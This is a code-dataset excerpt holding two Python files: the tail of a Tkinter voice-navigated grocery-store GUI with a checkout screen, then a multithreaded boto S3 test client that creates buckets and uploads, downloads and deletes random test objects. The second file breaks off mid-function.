        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Dairy.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Deli(tk.Frame):
    """Deli section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Deli.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Dry_goods(tk.Frame):
    """Dry-goods section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        # BUG FIX(review): the original path was "Dry decorations/Goods.jpg" —
        # the folder/name tokens were transposed; every other screen loads
        # "decorations/<Section>.jpg". TODO confirm the filename on disk.
        icon = Image.open("decorations/Dry Goods.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Health_beauty(tk.Frame):
    """Health & beauty section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        # BUG FIX(review): the original path was "Health decorations/Beauty.jpg" —
        # the folder/name tokens were transposed; every other screen loads
        # "decorations/<Section>.jpg". TODO confirm the filename on disk.
        icon = Image.open("decorations/Health Beauty.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Hygiene(tk.Frame):
    """Hygiene section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Hygiene.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Meat(tk.Frame):
    """Meat section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Meat.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Produce(tk.Frame):
    """Produce section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Produce.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Seafood(tk.Frame):
    """Seafood category screen: shows the category banner and lets the shopper
    jump to another category (or back) by button or by voice command."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Seafood.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow >= 10
        # (Image.Resampling.LANCZOS is the replacement) — confirm pinned Pillow version.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        # Keep a reference on the widget so the image is not garbage-collected.
        label.image = icon
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Listen for a category name and navigate to the matching frame,
        or show an error popup for the recognizer's failure sentinels."""
        # Renamed from 'input' — the original shadowed the builtin.
        spoken = voice_input().lower()
        destinations = {
            "bakery": Bakery,
            "dairy": Dairy,
            "deli": Deli,
            "dry goods": Dry_goods,
            "health and beauty": Health_beauty,
            "hygiene": Hygiene,
            "meat": Meat,
            "produce": Produce,
            "seafood": Seafood,
        }
        failures = {
            "not found": "Sorry, category not found :(",
            "inaudible": "Sorry, inaudible voice. Please try again",
            "error": "Sorry, service is unavailable",
        }
        if spoken in destinations:
            controller.show_frame(destinations[spoken])
        elif spoken in failures:
            self._popup_message(controller, failures[spoken])
        # Any other phrase is silently ignored, matching the original behaviour.

    def _popup_message(self, controller, message):
        """Show a transient error popup with an Okay button.

        Replaces three byte-identical copies of this popup code in the
        original `goto`.
        """
        # NOTE(review): a second tk.Tk() root is fragile; tk.Toplevel(self) is
        # the conventional choice — kept as tk.Tk() to preserve behaviour.
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Dismiss the popup and return to the Navigation frame."""
        popup.destroy()
        controller.show_frame(Navigation)
class Checkout(tk.Frame):
    """Shopping-cart screen: lists the current receipt in a table with a
    running total, plus Update / Return / Finish actions."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="Your Shopping Cart", font=(font_name, 12, 'bold'))
        label.place(relx=0.27, rely=0.075, anchor='center')
        # Widgets rebuilt on every refresh; tracked so stale ones can be destroyed.
        self._cart_widgets = []
        self.build_tree()
        button = tk.Button(self, text="Update", font=(font_name, 10), width=21, height=1,
                           command=lambda: self.update(controller))
        button.place(relx=0.7, rely=0.075, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=21, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.3, rely=0.9, anchor='center')
        button = tk.Button(self, text="Finish", font=(font_name, 10), width=21, height=1,
                           command=lambda: self.popup(controller))
        button.place(relx=0.7, rely=0.9, anchor='center')

    def build_tree(self):
        """(Re)build the receipt table and total labels from nao.receipt().

        BUG FIX: the original created a brand-new Treeview and new total labels
        on every call, stacking live widgets on top of each other each time the
        cart was updated.  Stale widgets are now destroyed first.
        """
        for widget in getattr(self, '_cart_widgets', []):
            widget.destroy()
        self._cart_widgets = []
        shopping_list = nao.receipt()
        cols = ('No.', 'Item', 'Qty.', 'Price', 'Total')
        table = ttk.Treeview(self, columns=cols, show='headings', height=14)
        table.place(relx=0.5, rely=0.125, anchor='n')
        self._cart_widgets.append(table)
        widths = (30, 225, 30, 40, 50)
        for col, width in zip(cols, widths):
            if col == 'Item':
                # Item names are left-aligned; everything else is centered.
                table.column(col, width=width, anchor='w')
                table.heading(col, text=col, anchor='w')
            else:
                table.column(col, width=width, anchor='center')
                table.heading(col, text=col)
        total = 0
        for i, entry in enumerate(shopping_list):
            value = entry['quantity'] * entry['price']
            total += value
            table.insert("", "end", values=(i + 1, entry['item'], entry['quantity'],
                                            entry['price'], str(value) + 'NTD'))
        label = tk.Label(self, text="Total:", font=(font_name, 10))
        label.place(relx=0.12, rely=0.84, anchor='w')
        self._cart_widgets.append(label)
        label = tk.Label(self, text=str(total) + ' NTD', font=(font_name, 10))
        label.place(relx=0.88, rely=0.84, anchor='e')
        self._cart_widgets.append(label)

    def update(self, controller):
        """Refresh the table contents and re-raise this frame."""
        self.build_tree()
        controller.show_frame(Checkout)

    def popup(self, controller):
        """Show the thank-you popup when the shopper finishes."""
        # NOTE(review): second tk.Tk() root; tk.Toplevel(self) would be
        # conventional — kept as-is to preserve behaviour.
        popup = tk.Tk()
        popup.wm_title("Goodbye~")
        popup.geometry("275x100")
        label = ttk.Label(popup, text="Thank you for shopping with us!", font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and shut the whole application down."""
        popup.destroy()
        controller.destroy()
#---------------------main---------------------------
if __name__=='__main__':
    # MainApp is the tk.Tk subclass defined earlier in this file that owns
    # all the category frames and the frame-switching controller.
    app = MainApp()
    app.title('mBot Market')
    # 500x450 window placed at screen offset (300, 300).
    app.geometry('500x450+300+300')
    app.mainloop()
| 47.5852
| 152
| 0.561838
| 5,958
| 48,870
| 4.525176
| 0.075361
| 0.053856
| 0.043767
| 0.047773
| 0.849412
| 0.842884
| 0.837654
| 0.833834
| 0.825563
| 0.821928
| 0
| 0.041503
| 0.282136
| 48,870
| 1,026
| 153
| 47.631579
| 0.727011
| 0.010211
| 0
| 0.765046
| 0
| 0
| 0.108362
| 0.004902
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.017361
| 0.001157
| 0.107639
| 0.002315
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5050360880f266454416dc4fb09402131c8bd57
| 28,891
|
py
|
Python
|
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | null | null | null |
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | null | null | null |
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | 1
|
2021-06-10T04:04:01.000Z
|
2021-06-10T04:04:01.000Z
|
import boto
import boto.s3.connection
import random
from boto.s3.key import Key
import logging
import time
import os
import math
import string
import random
import copy
import hashlib
from Queue import Queue
from threading import Thread
from boto.s3.cors import CORSConfiguration
# Module-level logger: records INFO and above to multiclient.log with
# timestamped entries; the logger itself is left at DEBUG so additional
# handlers could capture more detail.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
#Create a file handler
handler = logging.FileHandler('multiclient.log')
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
#Due to Pip related issues
#from rgwadmin import RGWAdmin
from filechunkio import FileChunkIO
#Initial Set of Tests
#Create a Bucket
#Write 10000 Small Objects < 100 KB (Random)
#Write 10000 Medium Objects < 1 - 10 MB (Random)
#Write 10000 Large Objects < 10 - 200 MB (Random)
#Get Objects
#Do MD5SUM
#Delete Objects
#Bucket Listing Should Be Zero
#Extend Test Case (Create Bucket Every 30 Mins)
#Repeat the Steps
#How to Catch Errors
#Initially log all the errors
#Then start logging all the error codes as well
class PoolWorker(Thread):
    """Daemon worker thread that forever pulls (func, args) tasks off a
    shared queue and executes them, logging any failure."""

    def __init__(self, queue):
        super(PoolWorker, self).__init__()
        self._q = queue
        # Background thread: must not keep the interpreter alive at shutdown.
        self.daemon = True
        self.start()

    def run(self):
        """Consume tasks until the process exits."""
        logger.info('Starting Thread')
        while True:
            # Queue.get blocks until a task arrives; Queue is thread safe.
            task, task_args = self._q.get()
            try:
                task(*task_args)
            except Exception as e:
                logger.error(e)
"""
Class Defining a Simple ThreadPool.
The Queue Size is init at the time of creation of the pool
The Enqueue Thread Will Block if the Queue if Full,
automatically backpressuring the system
Current Queue Size = 4, could be changed when system is tested
across various conigurations
"""
class ThreadPool(object):
    """Fixed-size pool of PoolWorker threads fed from one bounded queue."""

    def __init__(self, num_th):
        # A bounded queue backpressures producers while all workers are busy.
        self._q = Queue(num_th)
        for _ in range(num_th):
            PoolWorker(self._q)

    def add_task(self, func, args):
        """Enqueue func(*args); blocks while the queue is full."""
        try:
            self._q.put((func, args))
        except Exception as e:
            logger.error(e)
# Module-level counters shared (via `global`) by the test functions below.
# BUG FIX: the original assigned `ctr = 0` twice; the duplicate is removed.
ctr = 0       # generic test-iteration counter
mpuctr = 0    # multipart-upload test-iteration counter
s3_conn = 0   # placeholder; real connections are built under __main__
def startMPUTest(s3_conn, s3_conn_1, size):
    """Multipart-upload round trip: create a random bucket, upload a 200 MB
    object in ~12 MB parts, read it back via both connections, then clean up.
    `size` is accepted for signature parity with the other tests but unused."""
    global mpuctr
    logger.info("Running MPU Test for Iteration -> "+str(mpuctr))
    # NOTE(review): counter increment is unsynchronized; fine with a 1-worker pool.
    mpuctr = mpuctr + 1
    #Create The Bucket (random 24-char lowercase+digit name)
    chars = string.ascii_lowercase + string.digits
    pwdSize = 24
    bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
    logger.info("Bucket Name -> "+bucket_name)
    try:
        s3_conn.create_bucket(bucket_name)
    except Exception, e:
        print e
        return
    logger.info("Bucket Created -> "+bucket_name)
    try:
        bucket = s3_conn.get_bucket(bucket_name)
        bucket1 = s3_conn_1.get_bucket(bucket_name)
    except Exception, e:
        logger.error("Caught Exception in Get Bucket")
        logger.error(e)
    try:
        # Start multipart upload of a 200 MB random local file.
        filesize=200000000
        with open("mpuobj.data", "wb") as fout:
            fout.write(os.urandom(200000000))
        chunksize=12000000
        # NOTE(review): relies on Python 2 integer division inside ceil();
        # under Python 3 this would become float division — confirm before porting.
        chunkcount = int(math.ceil(filesize/chunksize))
        header = {
            'x-archive-queue-derive': '0'
        }
        mp = bucket.initiate_multipart_upload(os.path.basename("mpuobj.data"),headers=header)
        for i in range (chunkcount + 1):
            offset = chunksize * i
            bytes = min(chunksize, filesize - offset)
            with FileChunkIO( "mpuobj.data", 'r', offset=offset, bytes=bytes ) as fp:
                mp.upload_part_from_file( fp, part_num=i + 1, headers=header )
            logger.info("MultiPart Upload in progress for Iteration "+str(i))
        mp.complete_upload()
    except Exception, e:
        logger.error("Caught Exception in Uploading MPU Object")
        logger.error(e)
    logger.info("MultiPart Upload Done")
    #Get the File From Cluster (primary connection)
    try:
        objkey = bucket.get_key("mpuobj.data")
        toFileName = 'getobjs/'+"mpuobj.data"
        #print toFileName
        objkey.get_contents_to_filename(toFileName)
        logger.info("Got MPU File")
    except Exception, e:
        logger.error("Caught Exception in Getting file from Cluster ->"+"mpuobj.data")
    #Get the File From Cluster (second connection)
    try:
        objkey = bucket1.get_key("mpuobj.data")
        toFileName = 'getobjs1/'+"mpuobj.data"
        #print toFileName
        objkey.get_contents_to_filename(toFileName)
        logger.info("Got MPU File 1")
    except Exception, e:
        logger.error("Caught Exception in Getting file from Cluster 1->"+"mpuobj.data")
    # Allow time for replication before cleanup.
    time.sleep(90)
    try:
        bucket.delete_key("mpuobj.data")
        time.sleep(30)
        # NOTE(review): delete_bucket is given the Bucket object, unlike the
        # other tests which pass the bucket name — confirm boto accepts both here.
        s3_conn.delete_bucket(bucket)
    except Exception, e:
        logger.error("Error In Deleting MPU Object")
def startSpecialObjectTest(s3_conn, s3_conn_1, sizeObj):
    """Like startObjectTest, but exercises object keys containing special
    characters and spaces, nested under a long pseudo-directory prefix.
    `sizeObj` is accepted for signature parity but unused (sizes are random)."""
    global ctr
    longstrpath = "/some/file/long/dir/dcdcdcdxxxsxs/ccxc/"
    logger.info("Start Special Running Test for Iteration -> "+str(ctr))
    ctr = ctr + 1
    objectDict = {}
    bucket=0
    bucket1=0
    # Build 128 random names, alternating two flavours of special-char suffix.
    for i in range (128):
        chars = string.letters + string.digits
        pwdSize = 32
        fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
        fileName = fileName + ".data"
        if i%2 == 0 :
            fileName = fileName + "!*$ "
        else :
            fileName = fileName + " " + "!*&%" + "fileName"
        objectDict[i]=fileName
    #Print the Dict
    #for key in objectDict.keys():
        #print key, objectDict[key]
    #Create The Bucket
    chars = string.ascii_lowercase + string.digits
    pwdSize = 24
    bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
    logger.info("Bucket Name -> "+bucket_name)
    try:
        s3_conn.create_bucket(bucket_name)
    except Exception, e:
        logger.error("Bucket Name Create Exception -> "+bucket_name)
        logger.error(e)
        return
    logger.info("Bucket Created -> "+bucket_name)
    time.sleep(10)
    #Create the Object Locally (random size between 1 KB and ~900 KB)
    for key in objectDict.keys():
        try:
            size = random.randint(1024, 900000)
            with open(objectDict[key], "wb") as fout:
                fout.write(os.urandom(size))
        except Exception, e:
            logger.error("Caught Exception in Creating Data Objects")
            logger.error(e)
    try:
        bucket = s3_conn.get_bucket(bucket_name)
        bucket1 = s3_conn_1.get_bucket(bucket_name)
    except Exception, e:
